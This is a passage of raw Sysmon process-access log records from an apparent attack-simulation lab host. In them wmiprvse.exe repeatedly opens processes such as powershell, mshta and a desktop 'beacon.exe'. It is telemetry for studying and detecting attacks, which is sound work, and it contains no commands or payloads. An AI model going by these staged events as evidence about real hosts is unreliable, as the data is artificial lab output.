.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 